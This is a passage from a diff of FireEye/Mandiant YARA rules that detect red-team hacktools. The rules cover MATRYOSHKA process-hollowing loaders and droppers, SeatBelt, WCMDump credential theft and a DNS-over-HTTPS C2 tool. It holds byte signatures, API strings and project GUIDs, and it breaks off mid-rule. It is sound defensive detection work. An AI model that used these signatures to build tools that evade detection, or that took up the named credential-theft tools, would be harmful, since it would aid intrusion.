"https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEFARCE/production/yara/HackTool_MSIL_KeeFarce_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPWEBCRAWLER_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "8db86230849137608880dbe448737fc70068d308772e294cc69301b18ae10908" + logic_hash = "8df328663a813ca0a6864ae0503cbc1b03cfdf839215b9b4f2bb7962adf09bf8" score = 75 quality = 73 tags = "FILE" - rev = 3 + rev = 2 strings: - $typelibguid0 = "17589ea6-fcc9-44bb-92ad-d5b3eea6af03" ascii nocase wide + $typelibguid0 = "cf27abf4-ef35-46cd-8d0c-756630c686f1" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_2 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDACL_1 : FILE { meta: - description = "matryoshka.rs" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdacl' project." author = "FireEye" - id = "25f916bc-6ee1-5175-903c-4266b0a086e1" - date = "2020-12-02" - date = "2020-12-02" + id = "13f4e3ea-1e36-5fad-9197-66511d6f026a" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_2.yar#L4-L20" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDACL_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "7f8102b789303b7861a03290c79feba0" - logic_hash = "daa6f6d526bf959c268b2c5a4cae33307cfec5e9ca51283131bbfa66a582b505" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "5f44ec5ddded18fb3a9132b469b2fe7ccbffb3f907325485f0f72fe3d6bbfa23" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 1 + rev = 3 strings: - $sb1 = { 4D [2] 00 49 [2] 08 B? 02 00 00 00 31 ?? E8 [4] 48 89 ?? 48 89 ?? 4C 89 ?? 49 89 ?? E8 [4] 4C 89 ?? 48 89 ?? E8 [4] 83 [2] 01 0F 84 [4] 48 89 ?? 48 8B [2] 48 8B [2] 48 89 [5] 48 89 [5] 48 89 [5] 41 B? [4] 4C 89 ?? 31 ?? E8 [4] C7 45 [5] 48 89 ?? 4C 89 ?? E8 [4] 85 C0 } - $sb2 = { 4C [2] 0F 83 [4] 41 0F [3] 01 41 32 [2] 00 48 8B [5] 48 3B [5] 75 ?? 41 B? 01 00 00 00 4C 89 ?? E8 [4] E9 } - $si1 = "CreateToolhelp32Snapshot" fullword - $si2 = "Process32Next" fullword + $typelibguid0 = "b3c17fb5-5d5a-4b14-af3c-87a9aa941457" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them + filesize <10MB and ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Builder_Win64_MATRYOSHKA_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_MODIFIEDSHARPVIEW_1 : FILE { meta: - description = "matryoshka_pe_to_shellcode.rs" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'modifiedsharpview' project." author = "FireEye" - id = "0afcf13e-5cd3-5c1c-897e-b6d0c283ab0f" - date = "2020-12-02" - date = "2020-12-02" + id = "e07d3d4b-fba3-5df7-85f4-927bb8cec2d1" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_Win64_MATRYOSHKA_1.yar#L4-L20" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_MODIFIEDSHARPVIEW_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "8d949c34def898f0f32544e43117c057" - logic_hash = "b370d7dea44bccc92fc8dbd4ea0ee9bec523820108bf8bc67acb17ebf9835f74" + hash = "db0eaad52465d5a2b86fdd6a6aa869a5" + logic_hash = "a47c48da998243fab92665649fb9d6ecc6ac32e1fd884c2c0d5ccecb05290c10" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 1 + rev = 3 strings: - $sb1 = { 4D 5A 45 52 [0-32] E8 [0-32] 00 00 00 00 [0-32] 5B 48 83 EB 09 53 48 81 [0-32] C3 [0-32] FF D3 [0-32] C3 } - $ss1 = "\x00Stub Size: " - $ss2 = "\x00Executable Size: " - $ss3 = "\x00[+] Writing out to file" + $typelibguid0 = "22a156ea-2623-45c7-8e50-e864d9fc44d3" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Builder_PY_MATRYOSHKA_1 +rule FIREEYE_RT_Credtheft_MSIL_Wcmdump_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WCMDump' project." author = "FireEye" - id = "0135f3bb-28b3-5fc4-85a2-b12c46c8bc45" - date = "2020-12-02" - date = "2020-12-02" + id = "22796ccb-a01e-59d8-8c3a-6cbb62899940" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_PY_MATRYOSHKA_1.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_WCMDump_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "25a97f6dba87ef9906a62c1a305ee1dd" - logic_hash = "71b26f4b319429ac356b55d22bccd1da85894d61f8c96452422de78d2d893420" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "9fbf53e551342695b306b10f30a3fe32dff359bd70e84e1fa1f190772f5dcbe3" score = 75 - quality = 75 - tags = "" + quality = 73 + tags = "FILE" rev = 1 strings: - $s1 = ".pop(0)])" - $s2 = "[1].replace('unsigned char buf[] = \"'" - $s3 = "binascii.hexlify(f.read()).decode(" - $s4 = "os.system(\"cargo build {0} --bin {1}\".format(" - $s5 = "shutil.which('rustc')" - $s6 = "~/.cargo/bin" - $s7 = /[\x22\x27]\\\\x[\x22\x27]\.join\(\[\w{1,64}\[\w{1,64}:\w{1,64}[\x09\x20]{0,32}\+[\x09\x20]{0,32}2\]/ + $typelibguid0 = "21e322f2-4586-4aeb-b1ed-d240e2a79e19" ascii nocase wide condition: - all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Dropper_Win64_MATRYOSHKA_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSQLCLIENT_1 : FILE { meta: - description = "matryoshka_dropper.rs" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpsqlclient' project." author = "FireEye" - id = "1406aafd-6217-51ef-b3af-107ee88f9c99" - date = "2020-12-02" - date = "2020-12-02" + id = "4d526c36-f56f-53cf-9bdf-b7a15619eb41" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win64_MATRYOSHKA_1.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPSQLCLIENT_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "edcd58ba5b1b87705e95089002312281" - logic_hash = "23f811f8e9387ca6a1257a31af66de9739733e4728adba0a3e3f74b5e5c0a556" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "bc79f80582f4fadecf54d926abdcf61694224654ba5075203f0d1123cf11afc1" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 1 + rev = 2 strings: - $sb1 = { 8D 8D [4] E8 [4] 49 89 D0 C6 [2-6] 01 C6 [2-6] 01 [0-8] C7 44 24 ?? 0E 00 00 00 4C 8D 0D [4] 48 8D 8D [4] 48 89 C2 E8 [4] C6 [2-6] 01 C6 [2-6] 01 48 89 E9 48 8D 95 [4] E8 [4] 83 [2] 01 0F 8? [4] 48 01 F3 48 29 F7 48 [2] 08 48 89 85 [4] C6 [2-6] 01 C6 [2-6] 01 C6 [2-6] 01 48 8D 8D [4] 48 89 DA 49 89 F8 E8 } - $sb2 = { 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 68 00 00 00 48 8B [2] 48 8D [2] 48 89 [3] 48 89 [3] 0F 11 44 24 ?? C7 44 24 ?? 08 00 00 0C C7 44 24 ?? 00 00 00 00 31 ?? 48 89 ?? 31 ?? 45 31 ?? 45 31 ?? E8 [4] 83 F8 01 } + $typelibguid0 = "13ed03cd-7430-410d-a069-cf377165fbfd" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNATIVEZIPPER_1 : FILE { meta: - description = "matryoshka_process_hollow.rs" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpnativezipper' project." author = "FireEye" - id = "69919a80-8ed1-5b8c-911a-ceb75570f11f" - date = "2020-12-02" - date = "2020-12-02" + id = "c48835a7-06fe-5b30-be4d-086d98dc7a21" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_1.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPNATIVEZIPPER_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "44887551a47ae272d7873a354d24042d" - logic_hash = "46e5480dc95ce8b9d8385c2e44a50b21629301535b93833c13cc3db319ac15dd" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "fa54375b21abbb613e695f70a15233575fbe6e0536716544bb3b527f5e3ed8c6" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 1 + rev = 3 strings: - $sb1 = { 48 8B 45 ?? 48 89 85 [0-64] C7 45 ?? 00 00 00 00 31 ?? E8 [4-64] BA 00 10 00 00 [0-32] 41 B8 04 00 00 00 E8 [4] 83 F8 01 [2-32] BA [4] E8 } - $sb2 = { E8 [4] 83 F8 01 [2-64] 41 B9 00 10 00 00 [0-32] E8 [4] 83 F8 01 [2-32] 3D 4D 5A 00 00 [0-32] 48 63 ?? 3C [0-32] 50 45 00 00 [4-64] 0F B7 [2] 18 81 ?? 0B 01 00 00 [2-32] 81 ?? 0B 02 00 00 [2-32] 8B [2] 28 } - $sb3 = { 66 C7 45 ?? 48 B8 48 C7 45 ?? 00 00 00 00 66 C7 45 ?? FF E0 [0-64] 41 B9 40 00 00 00 [0-32] E8 [4] 83 F8 01 } + $typelibguid0 = "de5536db-9a35-4e06-bc75-128713ea6d27" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Loader_Win_MATRYOSHKA_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPGOPHER_1 : FILE { meta: - description = "matryoshka_process_hollow.rs" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpgopher' project." author = "FireEye" - id = "c07fb67e-ded5-593d-b5dc-d0e2c3b5a352" - date = "2020-12-02" - date = "2020-12-02" + id = "cc8eb9cd-9a51-5fab-b0a4-247baaa69dd7" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win_MATRYOSHKA_1.yar#L4-L24" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPGOPHER_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "44887551a47ae272d7873a354d24042d" - logic_hash = "8f762684ffd3984630bf41ededa78b8993b53b22591a59912cabfe635775de53" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "ac37f77440cb76d7dafa4c9b4130471ca6ca760f6d72691db9ebb8cbaaad0c58" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 1 + rev = 2 strings: - $s1 = "ZwQueryInformationProcess" fullword - $s2 = "WriteProcessMemory" fullword - $s3 = "CreateProcessW" fullword - $s4 = "WriteProcessMemory" fullword - $s5 = "\x00Invalid NT Signature!\x00" - $s6 = "\x00Error while creating and mapping section. NTStatus: " - $s7 = "\x00Error no process information - NTSTATUS:" - $s8 = "\x00Error while erasing pe header. NTStatus: " + $typelibguid0 = "83413a89-7f5f-4c3f-805d-f4692bc60173" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Dropper_Win_MATRYOSHKA_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_REDTEAMMATERIALS_1 : FILE { meta: - description = "matryoshka_dropper.rs" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'red_team_materials' project." author = "FireEye" - id = "7fd305c7-0b1b-5d91-b968-7f1fb0a8ae47" - date = "2020-12-02" - date = "2020-12-02" + id = "272cd3e9-884a-566b-ae90-4a79ee726a8d" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win_MATRYOSHKA_1.yar#L4-L20" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_REDTEAMMATERIALS_1.yar#L4-L16" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "edcd58ba5b1b87705e95089002312281" - logic_hash = "a7bf7599ec9b4b1d09a8c90b70ae565a9396fb31d449da3c1492d6fa336d9c5e" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "ca54a1e8335c4256295fc643f5d31eae2e89f020dc7a9b571c4772edaad08022" score = 75 - quality = 75 + quality = 71 tags = "FILE" - rev = 1 + rev = 3 strings: - $s1 = "\x00matryoshka.exe\x00" - $s2 = "\x00Unable to write data\x00" - $s3 = "\x00Error while spawning process. NTStatus: \x0a\x00" - $s4 = "\x00.execmdstart/Cfailed to execute process\x00" + $typelibguid0 = "86c95a99-a2d6-4ebe-ad5f-9885b06eab12" ascii nocase wide + $typelibguid1 = "e06f1411-c7f8-4538-bbb9-46c928732245" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hacktool_MSIL_Corehound_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPZIPLIBZIPPER_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CoreHound' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpziplibzipper' project." author = "FireEye" - id = "8c914b34-3e3d-53ae-a5e4-9dbfdff45a24" + id = "392a52be-29ae-58e1-b517-1ab34a1e1fb8" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/COREHOUND/production/yara/HackTool_MSIL_CoreHound_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPZIPLIBZIPPER_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "b0f759709428d5c9404507a13259bf85cb8c405d38b807539098f7cc871023d8" + logic_hash = "19354edb91a0d79fdf79437f7247bcf155514db40340af91a3320b556dc2e4c2" score = 75 quality = 73 tags = "FILE" - rev = 1 + rev = 3 strings: - $typelibguid0 = "1fff2aee-a540-4613-94ee-4f208b30c599" ascii nocase wide + $typelibguid0 = "485ba350-59c4-4932-a4c1-c96ffec511ef" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hacktool_MSIL_Prepshellcode_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDNS_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'PrepShellcode' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdns' project." author = "FireEye" - id = "32fb6b1d-e01f-5555-8516-088dca2166cf" + id = "db6b45be-f42f-5d0f-b50a-32e7a2cbfce6" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PREPSHELLCODE/production/yara/HackTool_MSIL_PrepShellcode_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDNS_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "aedae87d84275f6589c982c04175ddc0aee3e4f3ae959ced4b4e2294675522e6" + logic_hash = "bab36f9b1532c3b24c2aea2907006820ed7cf1c90dae7a8138962e14ac9eff55" score = 75 quality = 73 tags = "FILE" rev = 2 strings: - $typelibguid0 = "d16ed275-70d5-4ae5-8ce7-d249f967616c" ascii nocase wide + $typelibguid0 = "d888cec8-7562-40e9-9c76-2bb9e43bb634" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_PRAT_1 : FILE { meta: - description = "This rule looks for .NET PE files that have regex and format strings found in the public tool SeatBelt. Due to the nature of the regex and format strings used for detection, this rule should detect custom variants of the SeatBelt project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'prat' project." author = "FireEye" - id = "46477f87-2458-5b8e-894a-9aa536a441ad" + id = "4a876eb0-ed2f-5ef2-a9b3-ba728b07c8c0" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_1.yar#L4-L25" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_PRAT_1.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "848837b83865f3854801be1f25cb9f4d" - logic_hash = "4248e5561ef60e725c23efc89c899d6fc8be5bf2142f700fb70daecd72c30dd8" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "d707f017b56b0a873f1edca085ad40fc70cb24e8c9844f377bc28871a941d0b4" score = 75 - quality = 30 + quality = 67 tags = "FILE" rev = 3 strings: - $msil = "_CorExeMain" ascii wide - $str1 = "{ Process = {0}, Path = {1}, CommandLine = {2} }" ascii nocase wide - $str2 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii nocase wide - $str3 = "LogonId=\"(\\d+)\"" ascii nocase wide - $str4 = "{0}.{1}.{2}.{3}" ascii nocase wide - $str5 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii nocase wide - $str6 = "*[System/EventID={0}]" ascii nocase wide - $str7 = "*[System[TimeCreated[@SystemTime >= '{" ascii nocase wide - $str8 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii nocase wide - $str9 = "{0}" ascii nocase wide - $str10 = "{0,-23}" ascii nocase wide + $typelibguid0 = "7d1219fb-a954-49a7-96c9-df9e6429a8c7" ascii nocase wide + $typelibguid1 = "bc1157c2-aa6d-46f8-8d73-068fc08a6706" ascii nocase wide + $typelibguid2 = "c602fae2-b831-41e2-b5f8-d4df6e3255df" ascii nocase wide + $typelibguid3 = "dfaa0b7d-6184-4a9a-9eeb-c08622d15801" ascii nocase wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $msil and all of ($str*) + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_2 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_DNSOVERHTTPS_C2_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SeatBelt project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'DoHC2' External C2 project." author = "FireEye" - id = "225b42fe-c73a-59c0-a1f4-1d6dff6e76e1" + id = "ee71be6c-e3c8-5365-9f32-157f00066c49" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_2.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_DNSOVERHTTPS_C2_1.yar#L4-L16" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "9f401176a9dd18fa2b5b90b4a2aa1356" - logic_hash = "e48474c5025fd88e3c2824e1e943ff56cde0ea05984aad0249ccf73caa6d4a36" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "a482161bbd8e249977f28466ff1381d4693495f8b8ccd9183ae4fde1ec1471eb" score = 75 - quality = 73 + quality = 71 tags = "FILE" - rev = 3 + rev = 2 strings: - $typelibguid1 = "AEC32155-D589-4150-8FE7-2900DF4554C8" ascii nocase wide + $typelibguid0 = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii nocase wide + $typelibguid1 = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii nocase wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_GPOHUNT_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPPATCHCHECK_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'gpohunt' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharppatchcheck' project." author = "FireEye" - id = "e4325f11-103c-5893-8978-9a72f7ca6105" + id = "dedc12b9-b9e7-5c13-ad6d-2e286aba2302" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GPOHUNT/production/yara/APT_HackTool_MSIL_GPOHUNT_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPPATCHCHECK_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "4b1f175dac123a6340494e2730d66c718478fb7618dc5611315992ed33e0f6c7" - score = 50 + logic_hash = "dec6231b656eed1526d4f70fe1b9a476bfb06246f0a7c25f2687d8c68886d400" + score = 75 quality = 73 tags = "FILE" - rev = 3 + rev = 2 strings: - $typelibguid0 = 